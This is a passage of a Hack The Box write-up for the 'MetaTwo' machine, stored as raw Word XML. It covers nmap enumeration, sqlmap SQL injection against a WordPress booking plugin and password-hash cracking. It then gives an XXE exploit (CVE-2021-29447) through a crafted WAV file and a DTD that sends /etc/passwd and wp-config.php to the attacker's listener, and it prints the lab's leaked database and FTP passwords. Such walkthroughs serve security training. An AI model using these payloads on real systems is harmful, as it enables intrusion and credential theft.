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Meta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Two</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Federico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pontoriero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="connection-and-nmap"/>
      <w:r>
        <w:t xml:space="preserve">Connection and nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First we connect to the openvpn that HTB provides us and spin the machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Then we will use nmap, as usual for enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sC -sV -T4 10.10.11.186</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The options are following:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-sC: to use the default scripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-sV: probes the open ports for system information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-T4: to define the aggressiveness of the scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="first-steps"/>
      <w:r>
        <w:t xml:space="preserve">First steps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can gather that there are 3 open ports: 21 (ftp), 22 (ssh) and 80 (http).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The version of OpenSSH that is being used does not seem to be vulnerable but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we can try other things such as connecting through ftp:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.11.186</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and trying to log as anonymous. This does not work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we are left with the http service which we know that is nginx/1.18.0 and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hostname is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://metapress.htb/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We then have to go to /etc/hosts and append the ip and hostname using any text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">editor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This allows us to open the hostname in the browser without any problem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of course this is true for Linux (which you probably should be using), in Windows is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a little more complicated and I struggled to be able to do this the first time. I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tried to change the host file in System32, then flush the dns and nothing worked.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Finally I simply installed firefox in WSL2 Kali and I use VcXsrv to view all GUI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">apps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One way or another we should be able to browse the page now.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="looking-for-vulnerabilities"/>
      <w:r>
        <w:t xml:space="preserve">Looking for vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can look at the source code and it does not seem to be leaking any credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">but we can see it's a Wordpress site. We can play around with the forms and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">explore a little. Now we will use wpscan which is a command line tool for Wordpress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://metapress.htb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="enumerating-databases-sqlmap"/>
      <w:r>
        <w:t xml:space="preserve">Enumerating databases: Sqlmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we can use sqlmap, which is a tool for automating the process of detecting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and exploiting SQL injection vulnerabilities. We can use it to identify the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database management system, enumerate databases, tables and columns, extract the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">data and even run commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --data="action=bookingpress_front_get_category_services&amp;_wpnonce=1b624223cc&amp;category_id=33&amp;total_service=1" -p "total_service" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">That way we can enumerate the databases present. I had problems with this command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">since it kept saying that the connection was not stable but i just kept trying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and eventually I could do it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The databases that we could found are two: blog and information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The first one is the most interesting of the two, clearly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --data="action=bookingpress_front_get_category_services&amp;_wpnonce=1b624223cc&amp;category_id=33&amp;total_service=1" -D blog --tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we look inside the blog database and enumerate the tables: there is a lot of them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">but the first that catches the eye is wp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. After some horrible looking output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we can see that it found two users, admin and manager.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Along side the names we can see the hashes that correspond to the passwords, so we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">will copy them to a file and try to crack them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="cracking-the-passwords-john-the-ripper"/>
      <w:r>
        <w:t xml:space="preserve">Cracking the passwords: John the Ripper</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">john password.txt --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We are using John the Reaper which is a hashcracking program, in this case we are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">using the classic rockyou wordlist that. I had to decompress the rockyou file before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utilizing the command, just so you know.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We see that it found one password, the manager's which is "partylikearockstar".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we have a username and a password but we have to find out where to enter them.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Although there is no login link in the page, based in our enumeration we know that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">there is a subdomain called "wp-admin". So if we go to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://metapress.htb/wp-admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we will encounter the Wordpress page for authentication, we enter the credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and we are in!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="exploiting-xxe"/>
      <w:r>
        <w:t xml:space="preserve">Exploiting XXE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Looking around the vulnerabilities of this version of Wordpress I encounter this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">article:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It's a fascinating thing. It essentially uses the metadata of a WAVE file to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inject payload and retrieve information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE ANY[&lt;!ENTITY % remote SYSTEM '"'"'http://10.10.14.83:1234/evil.dtd'"'"'&gt;%remote;%init;%trick;]&gt;\x00' &gt; payload.wav</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">That is the code that the author suggests, the only thing we should change it's the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ip, replacing it with our own and I also changed the port to 1234 for convenience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now if we continue with the article we have to send this payload through a dtd file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY % init "&lt;!ENTITY &amp;#x25; trick SYSTEM 'http://10.10.14.83:1234/?p=%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Again we have to modify the ip and port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We will start a php server:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php -S 0.0.0.0:1234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And we go the the media page. Then click on add new and upload our payload.wav while</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the server is still running. We will get a huge, horrible looking output but we can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decode it using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -en &lt;payload&gt; | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now the output looks much more interesting since these is the passwd file of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">machine we are trying to pawn. Of course if we analyze it there really is nothing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we can do with this. But it is useful to know that the vulnerability can be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If we modify the evil.dtd file that we created before to give us the config file of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the page we might be more lucky.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY % init "&lt;!ENTITY &amp;#x25; trick SYSTEM 'http://10.10.14.83:1234/?p=%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we upload the payload.wav file again and again we decode the output which will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">look like this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** The name of the database for WordPress */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'DB_NAME'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'blog'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** MySQL database username */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'DB_USER'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'blog'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** MySQL database password */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'DB_PASSWORD'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'635Aq@TdqrCwXFUZ'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** MySQL hostname */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'DB_HOST'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'localhost'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Database Charset to use in creating database tables. */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'DB_CHARSET'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'utf8mb4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** The Database Collate type. Don't change this if in doubt. */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'DB_COLLATE'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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'FS_METHOD'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'ftpext'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'FTP_USER'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'metapress.htb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'FTP_PASS'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'9NYS_ii@FyL_p5M2NvJ'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'FTP_HOST'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'ftp.metapress.htb'</w:t>
